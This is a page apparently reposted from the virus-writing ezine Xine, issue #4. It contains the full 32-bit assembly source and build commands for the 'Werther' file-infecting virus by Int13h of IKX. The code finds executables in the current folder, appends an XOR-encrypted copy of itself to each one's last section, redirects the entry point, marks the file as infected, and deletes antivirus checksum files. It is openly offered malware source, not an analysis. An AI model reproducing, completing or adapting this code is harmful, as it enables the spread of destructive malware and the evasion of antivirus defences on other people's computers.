Copy Link
Add to Bookmark
Report

Xine - issue #4 - Phile 213

eZine's profile picture
Published in 
Xine
 · 6 months ago

 
/-----------------------------\
| Xine - issue #4 - Phile 213 |
\-----------------------------/


; < < < < < < WERTHER Virus, coded by Int13h of IKX > > > > > >
; ___Random encrypted runtime portable executable last section expander___
; It deletes some AV checksum files.
;
; COMPILE:
; tasm /ml /m3 Werther,,;
; tlink32 -Tpe -c -v Werther,Werther,, import32.lib
;
;
.386
.model flat
jumps ; Still lazy in 32 bits
locals

Extrn ExitProcess:PROC

Location = 0BFF70000h ; Some kewl equates
Marker = 12
ImageBase = 52
EntryPRVA = 40
PhyOffset = 20
PhySize = 16
NumObjects = 06
RVA = 12
ObjAlign = 56
VirtSize = 08
FileAlign = 60
ImageSize = 80
SectSize = 40
ObjFlags = 36
Longitud1 = EnFiles-Codigo_Vivo
Longitud2 = EnMemoria-Codigo_Vivo
Saltar = Cifrado-Codigo_Vivo

.DATA
db 'J. W. Goethe rules!' ; Fool data, just 4 tasm
.CODE

INICIO: jmp Codigo_Vivo
Salida: push 00
call ExitProcess ; Just return to OS

CD13 segment para public 'INT13H'
assume cs:CD13

Codigo_Vivo:
pushad ; Save all registers
call Delta ; For delta offset calculation
Delta: pop edi ; EDI=EIP
sub edi,offset Delta ; EDI=delta offset

lea esi,[edi+offset Cifrado]
mov ecx,((offset EnFiles-offset Cifrado)/2)+1
Decrypt:db 066h,081h,036h ; XOR WORD PTR [ESI],0
Clave dw 0
inc esi
inc esi ; Increment our index
loop Decrypt

Cifrado:mov eax,Location
cmp word ptr [eax],'ZM' ; Kernel32 isn't where expected
jne Kernel

push dword ptr [edi+Retorno+1] ; Stack return address

lea ebx,[edi+APIaddresses] ; Where to put the addresses
mov ecx,10 ; Ten APIs
lea edx,[edi+APIs] ; APIs we'll use
FindAPIs:
push ebx ecx edi ; I am using Star0's method
mov edi,Location ; to get APIs directly
mov esi,edi ; from KERNEL32.DLL
sub ebx,ebx
mov bx,word ptr [edi+03ch] ; Get offset of PE header
add edi,ebx
mov eax,666 ; Flag as bad
cmp dword ptr [edi],000004550h ; PE signture here?
jne Cancel ; Nope, leave
mov ebx,dword ptr [edi+120]
lea edi,[esi+ebx]
mov ecx,dword ptr [edi+24]
mov ebx,dword ptr [edi+32]
add ebx,esi
mov ebp,edx
BuscarCadena:
mov eax,dword ptr [ebx]
add eax,esi
mov eax,dword ptr [eax]
cmp dword ptr [edx],eax
je ProbarNombre
Vamos: mov edx,ebp
add ebx,4
dec ecx
jnz BuscarCadena
mov eax,666 ; Sign an error
jmp Cancel
ProbarNombre:
mov eax,dword ptr [ebx]
add eax,esi
TestarNombre:
push eax
mov al,byte ptr [eax]
cmp byte ptr [edx],al
pop eax
jne Vamos
inc eax
inc edx
cmp byte ptr [edx+1],0 ; Until the 0...
jne TestarNombre
mov al,byte ptr [eax]
cmp byte ptr [edx],al
jne Vamos
add edx,2
push edx
mov eax,dword ptr [edi+24]
sub eax,ecx
shl eax,1
add eax,dword ptr [edi+36]
sub ebx,ebx
add eax,esi
mov bx,word ptr [eax]
xchg ebx,eax
shl eax,2
add eax,dword ptr [edi+28]
add eax,esi
mov eax,dword ptr [eax] ; Get it
add eax,esi
pop edx
Cancel: pop edi ecx ebx
cmp eax,666 ; Not found
je Errare
xchg dword ptr [ebx],eax ; Save address
add ebx,4 ; And point to the next dword
loop FindAPIs

call PutInt24h ; Set Error Mode
call DeleteSuckers ; Delete AV files
lea eax,[edi+offset Win32FindData] ; The FindData structure
push eax
lea eax,[edi+offset Victimas] ; *.EXE
push eax
call dword ptr [edi+FindFirstFile] ; call the API
mov dword ptr [edi+SearcHandle],eax ; Save the search handle
Ciclo: cmp eax,0ffffffffh ; Ask for error
je Errare
or eax,eax ; No more files?
jz Errare

push 00
push 00000080h
push 03
push 00
push 00
push 0C0000000h
lea eax,[edi+offset Hallado] ; Open the found EXE
push eax
call dword ptr [edi+CreateFile]
cmp eax,-1
je Cerrar
mov dword ptr [edi+FileHandle],eax ; Save file handle

push 00
push 00
push 0000003ch ; Move pointer at offset 03ch
push eax
call dword ptr [edi+SetFilePointer]

push 00
lea eax,dword ptr [edi+NumOfBytesRead]
push eax
push 04 ; Number of bytes to read
lea eax,dword ptr [edi+PEoffset] ; Where to read
push eax
push dword ptr [edi+FileHandle] ; Handle of our opened file
call dword ptr [edi+ReadFile]

push 00
push 00
push dword ptr [edi+PEoffset] ; Move pointer to PE
push dword ptr [edi+FileHandle] ; header location
call dword ptr [edi+SetFilePointer]

push 00
lea eax,dword ptr [edi+NumOfBytesRead]
push eax
push 000008F8h
lea eax,dword ptr [edi+PEHeader] ; Read the PE header
push eax
push dword ptr [edi+FileHandle]
call dword ptr [edi+ReadFile]

cmp word ptr [edi+PEHeader],04550h ; Is it a PE?
jne Cerrar

cmp word ptr [edi+PEHeader+Marker],0cd13h ; Already infected?
je Cerrar

sub eax,eax
mov ax,word ptr [edi+PEHeader+NumObjects]
dec ax ; Number of Objects-1
mov ecx,SectSize ; Section size=40 bytes
mul ecx ; Calcule RVA for the
push eax ; last section
pop esi
lea esi,[edi+esi+PEHeader+0F8h] ; ESI will point there

mov ecx,dword ptr [edi+PEHeader+ImageBase]
add ecx,dword ptr [edi+PEHeader+EntryPRVA]
mov dword ptr [edi+Retorno+1],ecx ; Save the hoste's return

mov eax,dword ptr [esi+PhyOffset]
add eax,dword ptr [esi+PhySize]
push eax ; We must write virus here

mov eax,dword ptr [esi+RVA]
add eax,dword ptr [esi+PhySize] ; Calculate the new entry point
mov dword ptr [edi+PEHeader+EntryPRVA],eax

mov ecx,dword ptr [edi+PEHeader+ObjAlign]
mov eax,dword ptr [esi+VirtSize]
add eax,Longitud2 ; Expand the last section
xor edx,edx ; virtual size
div ecx
inc eax
mul ecx
mov dword ptr [esi+VirtSize],eax

mov ecx,dword ptr [edi+PEHeader+FileAlign]
mov eax,dword ptr [esi+PhySize]
add eax,Longitud1 ; Expand the physical size
sub edx,edx ; of our last section
div ecx ; (room for virus)
inc eax
mul ecx
mov dword ptr [esi+PhySize],eax

mov dword ptr [esi+ObjFlags],0E0000000h
mov ecx,dword ptr [edi+PEHeader+FileAlign]
mov eax,dword ptr [edi+PEHeader+ImageSize]
add eax,Longitud2
sub edx,edx
div ecx
inc eax
mul ecx ; Update image size (+virus)
mov dword ptr [edi+PEHeader+ImageSize],eax
mov word ptr [edi+PEHeader+Marker],0cd13h ; Mark as infected!

pop eax
push 00
push 00
push eax ; Move to place for virus
push dword ptr [edi+FileHandle]
call dword ptr [edi+SetFilePointer]
or eax,eax
jz Cerrar

call Encryptor ; Generate encrypted virus copy

push 00
lea eax,dword ptr [edi+NumOfBytesRead]
push eax
mov eax,Longitud1
push eax
lea eax,dword ptr [edi+CopiaVirus] ; Write virus there
push eax
push dword ptr [edi+FileHandle]
call dword ptr [edi+WriteFile]
or eax,eax
jz Cerrar

push 00
push 00
push dword ptr [edi+PEoffset] ; Move to PE header offset
push dword ptr [edi+FileHandle]
call dword ptr [edi+SetFilePointer]
or eax,eax
jz Cerrar

push 00
lea eax,dword ptr [edi+NumOfBytesRead]
push eax
push 000008F8h ; Write our modified header
lea eax,dword ptr [edi+PEHeader]
push eax
push dword ptr [edi+FileHandle]
call dword ptr [edi+WriteFile]

Cerrar: push dword ptr [edi+FileHandle]
call dword ptr [edi+CloseHandle] ; Close the opened file

lea eax,[edi+offset Win32FindData]
push eax
push dword ptr [edi+SearcHandle]
call dword ptr [edi+FindNextFile] ; Look for the next one
jmp Ciclo

Errare: call RestoreInt24h
pop dword ptr [edi+Retorno+1] ; Original host's entry point
Kernel: popad
Retorno:mov eax,offset Salida
push eax ; EAX=EIP
ret ; Run hoste



DeleteSuckers: ; Delete AV files
lea esi,[edi+Borrar] ; Point to first one
mov ecx,4 ; We have 4 shits
Killer: push ecx
push esi
call dword ptr [edi+DeleteFile] ; Call our cool API
add esi,13 ; Point to next one
pop ecx
loop Killer
ret



PutInt24h:
push 1 ; SEM_FAILCRITICALERRORS
call dword ptr [edi+SetErrorMode]
mov dword ptr [edi+Anterior],eax ; Save old flags
ret



RestoreInt24h:
db 0b8h
Anterior dd 0 ; Old ErrorMode state
push eax
call dword ptr [edi+SetErrorMode] ; Restore it
ret



Encryptor:
call dword ptr [edi+GetTickCount]
mov word ptr [edi+Clave],ax ; Get random keyword

push edi ; Save delta offset
lea esi,[edi+offset Codigo_Vivo] ; Copy virus to buffer
lea edi,[edi+offset CopiaVirus]
mov ecx,Longitud1
rep movsb
pop edi ; Recover delta from stack

lea esi,[edi+offset CopiaVirus+Saltar]
mov ecx,((offset EnFiles-offset Cifrado)/2)+1
Cifrar: xor word ptr [esi],ax ; Encrypt a word
inc esi
inc esi
loop Cifrar
ret



APIs: db "FindFirstFileA",0
db "FindNextFileA",0
db "CreateFileA",0
db "SetFilePointer",0
db "ReadFile",0
db "WriteFile",0
db "CloseHandle",0
db "DeleteFileA",0
db "SetErrorMode",0
db "GetTickCount",0

APIaddresses:
FindFirstFile dd 0
FindNextFile dd 0
CreateFile dd 0
SetFilePointer dd 0
ReadFile dd 0
WriteFile dd 0
CloseHandle dd 0
DeleteFile dd 0
SetErrorMode dd 0
GetTickCount dd 0


TituloVentana db 'WERTHER VIRUS',0
TextoVentana db 'MaDe iN PaRaGuAy by Int13h/IKX',0
Victimas db '*.EXE',0
Borrar db 'AVP.CRC',0,0,0,0,0,0
db 'CHKLIST.MS',0,0,0
db 'CHKLIST.CPS',0,0
db 'ANTI-VIR.DAT',0
MsgToMyFriend db 'Star0: u r rite, stone coding must be prohibited! ;)'

EnFiles label byte ; Virus limit in files
;# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

SearcHandle dd 0 ; For FindFirst/Next
FileHandle dd 0 ; When opening the victims
NumOfBytesRead dd 0 ; For reading function
PEoffset dd 0 ; Offset of PE in files
Win32FindData dd 0,0,0,0,0,0,0,0,0,0,0 ; WIN32.FindData Structure
Hallado db 0100h dup (0) ; The found file
db 0100h dup (0)
PEHeader db 08F8h dup (0) ; For reading the header
CopiaVirus db 1000 dup (0) ; Buffer for encryption

EnMemoria label byte ; Virus limit in memory
;# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

Ends
End INICIO



← previous
next →
loading
sending ...
New to Neperos ? Sign Up for free
download Neperos App from Google Play
install Neperos as PWA

Let's discover also

Recent Articles

Recent Comments

Neperos cookies
This website uses cookies to store your preferences and improve the service. Cookies authorization will allow me and / or my partners to process personal data such as browsing behaviour.

By pressing OK you agree to the Terms of Service and acknowledge the Privacy Policy

By pressing REJECT you will be able to continue to use Neperos (like read articles or write comments) but some important cookies will not be set. This may affect certain features and functions of the platform.
OK
REJECT